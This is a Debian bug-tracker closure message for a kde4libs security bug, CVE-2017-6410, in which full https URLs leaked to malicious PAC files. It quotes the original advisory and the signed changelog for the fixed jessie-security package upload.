Your message dated Sat, 27 May 2017 12:32:43 +0000 with message-id <e1deatf-000iwx...@fasolo.debian.org> and subject line Bug#856890: fixed in kde4libs 4:4.14.2-5+deb8u2 has caused the Debian Bug report #856890, regarding kde4libs: CVE-2017-6410: Information Leak when accessing https when using a malicious PAC file to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 856890: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=856890 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems
--- Begin Message ---Source: kde4libs Version: 4:4.14.26-1 Severity: important Tags: upstream patch security Hi, the following vulnerability was published for kde4libs. CVE-2017-6410[0]: | kpac/script.cpp in KDE kio before 5.32 and kdelibs before 4.14.30 calls | the PAC FindProxyForURL function with a full https URL (potentially | including Basic Authentication credentials, a query string, or | PATH_INFO), which allows remote attackers to obtain sensitive | information via a crafted PAC file. If you fix the vulnerability please also make sure to include the CVE (Common Vulnerabilities & Exposures) id in your changelog entry. For further information see: [0] https://security-tracker.debian.org/tracker/CVE-2017-6410 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6410 [1] https://commits.kde.org/kdelibs/1804c2fde7bf4e432c6cf5bb8cce5701c7010559 [2] https://www.kde.org/info/security/advisory-20170228-1.txt Please adjust the affected versions in the BTS as needed. Regards, Salvatore
--- End Message ---
--- Begin Message ---Source: kde4libs Source-Version: 4:4.14.2-5+deb8u2 We believe that the bug you reported is fixed in the latest version of kde4libs, which is due to be installed in the Debian FTP archive. A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to 856...@bugs.debian.org, and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Salvatore Bonaccorso <car...@debian.org> (supplier of updated kde4libs package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing ftpmas...@ftp-master.debian.org) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Format: 1.8 Date: Thu, 11 May 2017 14:33:29 +0200 Source: kde4libs Binary: libkdecore5 libkdeui5 libkpty4 libkdesu5 libkjsapi4 libkjsembed4 libkio5 libkntlm4 libsolid4 libkde3support4 libkfile4 libknewstuff2-4 libknewstuff3-4 libkparts4 libkutils4 libthreadweaver4 libkhtml5 libkimproxy4 libkmediaplayer4 libktexteditor4 libknotifyconfig4 libkdnssd4 libkrosscore4 libkrossui4 libnepomuk4 libnepomukutils4 libnepomukquery4a libplasma3 libkunitconversion4 libkdewebkit5 libkcmutils4 libkemoticons4 libkidletime4 libkprintutils4 libkdeclarative5 kdelibs-bin kdelibs5-plugins kdelibs5-data kdoctools kdelibs5-dev kdelibs5-dbg Architecture: all source Version: 4:4.14.2-5+deb8u2 Distribution: jessie-security Urgency: high Maintainer: Debian Qt/KDE Maintainers <debian-qt-kde@lists.debian.org> Changed-By: Salvatore Bonaccorso <car...@debian.org> Closes: 856890 Description: kdelibs-bin - core executables for KDE Applications kdelibs5-data - core shared data for all KDE Applications kdelibs5-dbg - debugging symbols for the KDE Development Platform libraries kdelibs5-dev - development files for the KDE Development Platform libraries kdelibs5-plugins - core plugins for KDE Applications kdoctools - various tools for accessing application documentation libkcmutils4 - utility classes for using KCM modules libkde3support4 - KDE 3 Support Library for the KDE 4 Platform libkdeclarative5 - declarative library for plasma libkdecore5 - KDE Platform Core Library libkdesu5 - Console-mode Authentication Library for the KDE Platform libkdeui5 - KDE Platform User Interface Library libkdewebkit5 - KDE WebKit Library libkdnssd4 - DNS-SD Protocol Library for the KDE Platform libkemoticons4 - utility classes to deal with emoticon themes libkfile4 - File Selection Dialog Library for KDE Platform libkhtml5 - KHTML Web Content Rendering Engine libkidletime4 - library to provide information about idle time libkimproxy4 - Instant Messaging Interface Library for the KDE Platform libkio5 - Network-enabled File Management Library for the KDE Platform libkjsapi4 - KJS API Library for the KDE Development Platform libkjsembed4 - library for binding JavaScript objects to QObjects libkmediaplayer4 - KMediaPlayer Interface for the KDE Platform libknewstuff2-4 - "Get Hot New Stuff" v2 Library for the KDE Platform libknewstuff3-4 - "Get Hot New Stuff" v3 Library for the KDE Platform libknotifyconfig4 - library for configuring KDE Notifications libkntlm4 - NTLM Authentication Library for the KDE Platform libkparts4 - Framework for the KDE Platform Graphical Components libkprintutils4 - utility classes to deal with printing libkpty4 - Pseudo Terminal Library for the KDE Platform libkrosscore4 - Kross Core Library libkrossui4 - Kross UI Library libktexteditor4 - KTextEditor interfaces for the KDE Platform libkunitconversion4 - Unit Conversion library for the KDE Platform libkutils4 - dummy transitional library libnepomuk4 - Nepomuk Meta Data Library libnepomukquery4a - Nepomuk Query Library for the KDE Platform libnepomukutils4 - Nepomuk Utility Library libplasma3 - Plasma Library for the KDE Platform libsolid4 - Solid Library for KDE Platform libthreadweaver4 - ThreadWeaver Library for the KDE Platform Changes: kde4libs (4:4.14.2-5+deb8u2) jessie-security; urgency=high . * Non-maintainer upload by the Security Team. * Sanitize URLs before passing them to FindProxyForURL (CVE-2017-6410) (Closes: #856890) * Verify that whoever is calling us is actually who he says he is (CVE-2017-8422) Checksums-Sha1: 0d32cae05c12fcfd598ef4d9fe40d56c8d89ffa4 5726 kde4libs_4.14.2-5+deb8u2.dsc b251f27ef28bb30c694ad6d6bfaaeaeef75c1c26 265480 kde4libs_4.14.2-5+deb8u2.debian.tar.xz fe575ae783525a393143669c167164603268db89 2921952 kdelibs5-data_4.14.2-5+deb8u2_all.deb Checksums-Sha256: cd12d53e00d42dcf000b06a057db7cb9732ded45712904f4310b78061f41b56c 5726 kde4libs_4.14.2-5+deb8u2.dsc 513a39e79e73a508de4a2f21174703838524ac68bc22a4bb629c363cf4460b91 265480 kde4libs_4.14.2-5+deb8u2.debian.tar.xz d3a24df4d837c8d022cfc66b6785fc3744d2339c1532c559971324d0e236b98f 2921952 kdelibs5-data_4.14.2-5+deb8u2_all.deb Files: 6fc64c2c240b582b34caf35714e0a33d 5726 libs optional kde4libs_4.14.2-5+deb8u2.dsc 70b3a9ef4a23bea28624b93899c3cfae 265480 libs optional kde4libs_4.14.2-5+deb8u2.debian.tar.xz 1072e7d27b9ccf1ee814f0b0de1a66ec 2921952 libs optional kdelibs5-data_4.14.2-5+deb8u2_all.deb -----BEGIN PGP SIGNATURE----- iQKmBAEBCgCQFiEERkRAmAjBceBVMd3uBUy48xNDz0QFAlkUi4pfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQSHGNhcm5pbEBk ZWJpYW4ub3JnAAoJEAVMuPMTQ89EuvYQAIXTGyQeRIB0wd9H+KrKevDkBsRqgvLR XZWz8Rgs0myppJbHCKrrPNQWSWsMUhp7Wkddxq7ymaW7CaRxHpRT2nF4XQjoLtbq Z3KQoq20dK5GuKEhnSDL9Ib2VBn9D2KBh58NHTQ/9uHMptcNimiQ4Muboe/U/2yf iF58Cjei3pWG/jdP3M8VTN63eP6e0usJM2R+ZcuUAphsHGH7xZRJJAIGBbGK6WzJ TPX7BnZi9pUSZ4SWzlrsTgaKboy8kXuN5o7hw3Y/mMU9AkMTrTNFLgt+oxhZU2Uu UeSYmpxgRvo5pTbuXggB1XN8qUeYc10jLi0LpDedLxM03Eyf12g3eRiSVHR/hO7T /26L0vgU2PFKY6S9PtHeeW1UZp7AX3l2w0pOuo3YeIVSAR9uecWuCCX8NSOnxjhu RAYKrTZJBV0q+RwN8ip0PPfOj6bNNQ3V1tJfqvrme5Kr63ezBk0A7LZgGvBhZyFV LYCJjoJ8iATIiMYJtaeqVBN7bWwnoqfIyG6fIDwQdyeOi4xO6K/UcZia7cnJLHvO HWdF0OobDjObKCBfC9Uj2j43CoN9d26egrdgept1HMboOy0bJGY+J/k3uMW5Hhah vSmJxSz/iv7nDvD1YlSjTaeW5PKnn3VLV3sGJZFijBe5jGVxhYYCyKLMbWKCqIOy V5T5gJkKAPoh =8DL9 -----END PGP SIGNATURE-----
--- End Message ---
